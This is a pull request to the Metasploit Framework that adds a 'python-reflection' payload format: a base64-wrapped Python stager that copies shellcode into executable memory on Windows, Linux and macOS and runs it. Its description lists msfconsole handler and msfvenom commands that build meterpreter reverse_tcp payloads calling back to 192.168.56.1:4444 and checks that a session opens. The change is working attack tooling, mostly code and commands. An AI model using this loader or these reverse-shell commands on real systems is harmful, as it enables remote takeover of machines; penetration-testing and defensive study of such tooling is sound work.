### PR TITLE
add python native stager

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -295,13 +295,19 @@ module Msf
     # This returns a hash for the exe format generation of payloads
     # @return [Hash] The hash needed for generating an executable format
     def exe_options
-      opts = { inject: keep }
+      opts = { inject: keep, payload: payload }
       unless template.blank?
         opts[:template_path] = File.dirname(template)
         opts[:template]      = File.basename(template)
       end
       unless secname.blank?
         opts[:secname]       = secname
+      end
+      if datastore['LHOST']
+        opts[:lhost] = datastore['LHOST']
+      end
+      if datastore['LPORT']
+        opts[:lport] = datastore['LPORT']
       end
       opts
     end

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -295,19 +295,13 @@ module Msf
     # This returns a hash for the exe format generation of payloads
     # @return [Hash] The hash needed for generating an executable format
     def exe_options
-      opts = { inject: keep, payload: payload }
+      opts = { inject: keep }
       unless template.blank?
         opts[:template_path] = File.dirname(template)
         opts[:template]      = File.basename(template)
       end
       unless secname.blank?
         opts[:secname]       = secname
-      end
-      if datastore['LHOST']
-        opts[:lhost] = datastore['LHOST']
-      end
-      if datastore['LPORT']
-        opts[:lport] = datastore['LPORT']
       end
       opts
     end

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1461,7 +1461,7 @@ else:
   c.mprotect(ptr,len(buf),mmap.PROT_READ|mmap.PROT_EXEC)
   ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
 )
-    python_code
+    "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{Rex::Text.encode_base64(python_code)}')[0]))"
   end
 
   def self.to_jsp(exe)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1441,27 +1441,27 @@ require 'msf/core/exe/segment_appender'
     unless [ ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_PPC ].include? arch
       raise RuntimeError, "Msf::Util::EXE.to_python_reflection is not compatible with #{arch}"
     end
-    python_code = <<-PYTHON
-#{Rex::Text.to_python(code)}
-import ctypes,os
-if os.name == 'nt':
- cbuf = (ctypes.c_char * len(buf)).from_buffer_copy(buf)
- ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
- ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_long(0),ctypes.c_long(len(buf)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
- ctypes.windll.kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p,ctypes.c_void_p,ctypes.c_int]
- ctypes.windll.kernel32.RtlMoveMemory(ptr,cbuf,ctypes.c_int(len(buf)))
- ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
-else:
- import mmap
- from ctypes.util import find_library
- c = ctypes.CDLL(find_library('c'))
- c.mmap.restype = ctypes.c_void_p
- ptr = c.mmap(0,len(buf),mmap.PROT_READ|mmap.PROT_WRITE,mmap.MAP_ANONYMOUS|mmap.MAP_PRIVATE,-1,0)
- ctypes.memmove(ptr,buf,len(buf))
- c.mprotect.argtypes = [ctypes.c_void_p,ctypes.c_int,ctypes.c_int]
- c.mprotect(ptr,len(buf),mmap.PROT_READ|mmap.PROT_EXEC)
- ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
-PYTHON
+    python_code = <<~PYTHON
+      #{Rex::Text.to_python(code)}
+      import ctypes,os
+      if os.name == 'nt':
+       cbuf = (ctypes.c_char * len(buf)).from_buffer_copy(buf)
+       ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
+       ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_long(0),ctypes.c_long(len(buf)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
+       ctypes.windll.kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p,ctypes.c_void_p,ctypes.c_int]
+       ctypes.windll.kernel32.RtlMoveMemory(ptr,cbuf,ctypes.c_int(len(buf)))
+       ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
+      else:
+       import mmap
+       from ctypes.util import find_library
+       c = ctypes.CDLL(find_library('c'))
+       c.mmap.restype = ctypes.c_void_p
+       ptr = c.mmap(0,len(buf),mmap.PROT_READ|mmap.PROT_WRITE,mmap.MAP_ANONYMOUS|mmap.MAP_PRIVATE,-1,0)
+       ctypes.memmove(ptr,buf,len(buf))
+       c.mprotect.argtypes = [ctypes.c_void_p,ctypes.c_int,ctypes.c_int]
+       c.mprotect(ptr,len(buf),mmap.PROT_READ|mmap.PROT_EXEC)
+       ctypes.CFUNCTYPE(ctypes.c_int)(ptr)()
+    PYTHON
 
     "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{Rex::Text.encode_base64(python_code)}')[0]))"
   end


### PR DESCRIPTION
Please see https://github.com/rapid7/metasploit-framework/pull/12965

## Verification

### Linux
- [x] `msfconsole -qx "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.py -f python-reflection`
- [x] **Verify** you get a session

### Windows x64
- [x]  `msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.py -f python-reflection`
- [x] **Verify** you get a session (from a 64bit python exe)

### Windows x86
- [x] `msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.py -f python-reflection`
- [x] **Verify** you get a session (from a 32bit python exe)

### OSX
- [x] Land #13100 
- [x] `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `./msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.py -f python-reflection`
- [x] **Verify** you get a session